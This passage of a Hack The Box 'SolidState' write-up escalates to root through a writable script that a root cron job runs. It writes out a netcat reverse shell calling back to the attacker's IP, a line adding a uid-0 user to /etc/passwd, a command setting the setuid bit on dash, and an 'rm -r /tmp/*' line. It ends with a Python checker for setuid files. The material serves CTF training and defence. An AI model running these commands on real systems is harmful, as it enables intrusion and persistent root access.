Open a root reverse shell

We add a line that opens a reverse shell.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
     os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 4444 >/tmp/f')
except:
     sys.exit()

We open a listener.

u505@kali:~/HTB/Machines/SolidState$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

After a few minutes, the reverse shell is opened.

u505@kali:~/HTB/Machines/SolidState$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.51.
Ncat: Connection from 10.10.10.51:55138.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c "import pty;pty.spawn('/bin/bash')"
root@solidstate:~# stty raw -echo
stty raw -echo

Alternative - add a new user to /etc/passwd

If there is no line for user u505 in /etc/passwd, we add one with uid 0, gid 0 and the password hello.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ vi tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
     os.system(' if [ `grep u505 /etc/passwd |wc -l` -eq 0 ] ; then echo "u505:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd ; fi ')
except:
     sys.exit()

After the cron job runs:

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ tail -n 4 /etc/passwd
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
u505:9kstx2Sjsh52k:0:0:root:/root:/bin/bash

And now we can ssh directly as our user u505.

u505@kali:~/HTB/Machines/SolidState/www$ ssh u505@solidstate.htb
u505@solidstate.htb's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Thu May 14 17:55:42 2020 from 10.10.14.28
root@solidstate:~# id
uid=0(root) gid=0(root) groups=0(root)

Alternative - setuid dash

u505@kali:~/HTB/Machines/SolidState$ /bin/dash -p
$ exit
u505@kali:~/HTB/Machines/SolidState$ man dash
...
          -p priviliged    Do not attempt to reset effective uid if it does
                           not match uid. This is not set by default to help
                           avoid incorrect usage by setuid root programs via
                           system(3) or popen(3).
...

On our system dash accepts the -p option, but on the target system it doesn't.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /bin/dash -p
/bin/dash: 0: Illegal option -p

This means that if the setuid bit is set, this version of dash doesn't drop the effective uid back to the caller's. We can program tmp.py to set the setuid bit on dash. The protection that bash has (dropping the effective uid unless -p is given) has not been implemented in this version of dash.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
-rwxr-xr-x 1 root root 124492 Jan 24  2017 /bin/dash

We modify tmp.py.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ vi tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
    os.system('chmod 4755 /bin/dash')
except:
    sys.exit()

After the cron job runs:

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -l /bin/dash
-rwsr-xr-x 1 root root 124492 Jan 24  2017 /bin/dash
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /bin/dash
# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)

We can observe that bash protects against this behaviour unless the -p option is given. Newer versions of dash fall back to the real uid as well.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /bin/dash
# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# bash
bash-4.4$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
bash-4.4$ exit
exit
# bash -p
bash-4.4# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# exit
exit
# id
uid=1001(mindy) gid=1001(mindy) euid=0(root) groups=1001(mindy)
# exit
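Whichever shell is used, the trace this escalation leaves on disk is an unexpected setuid bit on a system binary. As an added Python example (not from the original page), the following inventories setuid/setgid files under a root and diffs the result against a saved baseline, which is the check that would have caught the chmod 4755 above. The fixture directory, the file names and the function names are constructed for the example.

```python
import os
import shutil
import stat
import tempfile

SUID_BITS = stat.S_ISUID | stat.S_ISGID


def find_setuid(root):
    """Walk a tree without following symlinks and return the sorted relative
    paths of regular files carrying the setuid or setgid bit, with their octal
    mode. Equivalent to 'find ROOT -type f -perm /6000' in pure Python."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort
            if stat.S_ISREG(st.st_mode) and st.st_mode & SUID_BITS:
                found.append((os.path.relpath(full, root), oct(stat.S_IMODE(st.st_mode))))
    return sorted(found)


def diff_against_baseline(baseline, current):
    """Return entries that appeared or changed mode since the baseline was
    recorded; these are the files an administrator has to explain."""
    before = dict(baseline)
    return sorted((rel, mode) for rel, mode in current if before.get(rel) != mode)


def demo():
    """Constructed scenario: record a baseline of a fake bin directory, then
    set the setuid bit on 'dash' the way tmp.py did above, and diff again."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    try:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        for name in ("dash", "ls"):
            path = os.path.join(bindir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, 0o755)
        baseline = find_setuid(root)
        os.chmod(os.path.join(bindir, "dash"), 0o4755)  # the chmod 4755 from tmp.py
        current = find_setuid(root)
        return baseline, diff_against_baseline(baseline, current)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    baseline, changed = demo()
    print("baseline:", baseline)
    print("new or changed setuid/setgid files:", changed)
```

In practice the baseline is recorded right after installation and stored off the host, since a root attacker can edit a baseline that lives on the same disk.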

Root Flag

root@solidstate:~# cat /root/root.txt
<ROOT_FLAG>

Daniel Simao 22:57, 13 May 2020 (EDT)